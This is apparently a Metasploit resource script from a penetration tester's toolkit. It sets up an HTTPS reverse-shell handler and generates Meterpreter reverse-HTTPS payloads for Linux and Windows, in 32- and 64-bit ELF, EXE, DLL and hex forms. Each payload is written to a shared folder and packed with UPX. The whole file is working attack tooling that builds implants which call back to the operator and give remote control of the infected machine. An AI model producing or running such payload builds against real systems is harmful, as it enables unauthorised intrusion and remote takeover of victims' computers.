setg LPORT 443
setg PayloadUUIDTracking true
setg HandlerSSLCert /export/cert.pem
setg StagerVerifySSLCert true
setg IgnoreUnknownPayloads true
setg LURI /multi

# TODO clever user-agents so we know what's trying to connect to us

use payload/linux/x64/meterpreter_reverse_https
set PayloadUUIDName ParanoidStagedElf64
generate -f elf -o /pentest/share/r64
chmod 755 /pentest/share/r64
upx -9 /pentest/share/r64

use payload/linux/x86/meterpreter_reverse_https
set PayloadUUIDName ParanoidStagedElf32
generate -f elf -o /pentest/share/r32
chmod 755 /pentest/share/r32
upx -9 /pentest/share/r32

# these have to be staged: https://github.com/rapid7/metasploit-framework/issues/6364
use payload/windows/x64/meterpreter/reverse_winhttps
set PayloadUUIDName ParanoidStagedExe64
generate -f exe -o /pentest/share/r64.exe
generate -f hex -o /pentest/share/r64.hex
generate -f dll -o /pentest/share/r64.dll
upx -9 /pentest/share/r64.exe
upx -9 /pentest/share/r64.dll

use payload/windows/meterpreter/reverse_winhttps
set PayloadUUIDName ParanoidStagedExe32
generate -f exe -o /pentest/share/r32.exe
generate -f hex -o /pentest/share/r32.hex
generate -f dll -o /pentest/share/r32.dll
upx -9 /pentest/share/r32.exe
upx -9 /pentest/share/r32.dll

back
backup
